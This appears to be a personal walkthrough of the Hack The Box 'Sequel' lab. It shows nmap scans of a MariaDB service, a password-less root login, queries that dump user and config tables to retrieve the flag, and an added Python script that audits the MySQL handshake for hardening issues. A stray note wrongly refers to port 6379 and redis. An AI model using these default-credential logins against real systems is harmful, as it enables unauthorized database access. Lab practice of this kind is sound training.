02.SEQUEL (MYSQL)

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@oco:~$ nmap -sV -T4 {targetIP} -p-
 PORT     STATE SERVICE       VERSION
 3306/tcp open  mysql?
 
 * Typically '-sV' is used with Nmap to determine versions, but that's not always enough.
    - adding -sC is another good way to determine service versions
       - the -sC option runs safe scripts that are designed to provide useful
         information without being too intrusive or causing harm to the target systems.

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 3306
 PORT   STATE SERVICE VERSION
 3306/tcp open  mysql?
 | mysql-info: 
 |   Protocol: 10
 |   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
 |   Thread ID: 98
 |   Capabilities flags: 63486
 |   Some Capabilities: Support41Auth, InteractiveClient, Speaks41ProtocolOld, LongColumnFlag, SupportsCompression, SupportsTransactions, IgnoreSigpipes, ConnectWithDatabase, SupportsLoadDataLocal, FoundRows, IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, ODBCClient, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
 |   Status: Autocommit
 |   Salt: rq_ju/)~cRQ"RU7Sz-oi
 |_  Auth Plugin Name: mysql_native_password

 * the -sC option runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 3306
 PORT   STATE SERVICE
 3306/tcp open  mysql

 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 6379
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found then the service may be fully patched!
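The handshake banner that -sC pulled out above already tells a defender a few things without logging in. As an added example (not part of these notes), the script below parses that mysql-info block, decodes the lower 16 capability bits using the MySQL protocol's own bit names, and reports what a hardening review would flag; the sample block is the scan output copied from above, and the finding labels are my own.

```python
import re

# Lower 16 capability bits of the MySQL/MariaDB greeting, indexed by bit (mysql_com.h names).
CAPABILITY_BITS = [
    "CLIENT_LONG_PASSWORD", "CLIENT_FOUND_ROWS", "CLIENT_LONG_FLAG",
    "CLIENT_CONNECT_WITH_DB", "CLIENT_NO_SCHEMA", "CLIENT_COMPRESS",
    "CLIENT_ODBC", "CLIENT_LOCAL_FILES", "CLIENT_IGNORE_SPACE",
    "CLIENT_PROTOCOL_41", "CLIENT_INTERACTIVE", "CLIENT_SSL",
    "CLIENT_IGNORE_SIGPIPE", "CLIENT_TRANSACTIONS", "CLIENT_RESERVED",
    "CLIENT_SECURE_CONNECTION",
]

# The mysql-info block from the scan above, embedded so the script runs offline.
SAMPLE = """\
| mysql-info:
|   Protocol: 10
|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
|   Thread ID: 98
|   Capabilities flags: 63486
|   Status: Autocommit
|_  Auth Plugin Name: mysql_native_password
"""

def parse_mysql_info(text):
    """Return the 'Key: value' fields of an nmap mysql-info block as a dict."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"\|_?\s+([^:]+):\s*(.*)$", line)
        if m:
            fields[m.group(1).strip()] = m.group(2).strip()
    return fields

def decode_capabilities(flags):
    """Names of the lower-16 capability bits the server set in its greeting."""
    return {name for bit, name in enumerate(CAPABILITY_BITS) if flags & (1 << bit)}

def audit(fields):
    """Hardening findings readable from the unauthenticated handshake alone."""
    findings = []
    caps = decode_capabilities(int(fields["Capabilities flags"]))
    if "CLIENT_SSL" not in caps:
        findings.append("no-tls: CLIENT_SSL not advertised; sessions are unencrypted")
    version = re.search(r"(\d+\.\d+\.\d+)-MariaDB", fields.get("Version", ""))
    if version:
        findings.append(f"version-disclosure: MariaDB {version.group(1)} shown pre-auth")
    if fields.get("Auth Plugin Name") == "mysql_native_password":
        findings.append("weak-auth-plugin: mysql_native_password (SHA-1 challenge); prefer ed25519")
    return findings
```

Run `audit(parse_mysql_info(SAMPLE))` to get the three findings for this host; 63486 has bit 11 clear, which is why nmap's capability list above contains no SSL entry.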

FOOTHOLD/COMPROMISE

Submit root flag
root@htb:~$ which mysql
root@htb:~$ mysql --help
root@htb:~$ mysql -u root -h 10.129.198.75
 MariaDB [(none)]> 
 
 * root is the superuser account in MySQL, similar to the root user in Unix/Linux
   systems. It has full privileges on the database server. It is the default for most installations.
    - other possible defaults are mysql & admin
    
MariaDB [(none)]> help;
MariaDB [(none)]> show databases;
 htb
MariaDB [(none)]> use htb;
MariaDB [htb]> show tables;
MariaDB [htb]> select * from users;
 +----+----------+------------------+
 | id | username | email            |
 +----+----------+------------------+
 |  1 | admin    | admin@sequel.htb |
 |  2 | lara     | lara@sequel.htb  |
 |  3 | sam      | sam@sequel.htb   |
 |  4 | mary     | mary@sequel.htb  |
 +----+----------+------------------+
 4 rows in set (0.010 sec)

MariaDB [htb]> select * from config;
 +----+-----------------------+----------------------------------+
 | id | name                  | value                            |
 +----+-----------------------+----------------------------------+
 |  1 | timeout               | 60s                              |
 |  2 | security              | default                          |
 |  3 | auto_logon            | false                            |
 |  4 | max_size              | 2M                               |
 |  5 | flag                  | 7b4bec00d1a39e3dd4e021ec3d915da8 |
 |  6 | enable_uploads        | false                            |
 |  7 | authentication_method | radius                           |
 +----+-----------------------+----------------------------------+
 7 rows in set (0.010 sec)
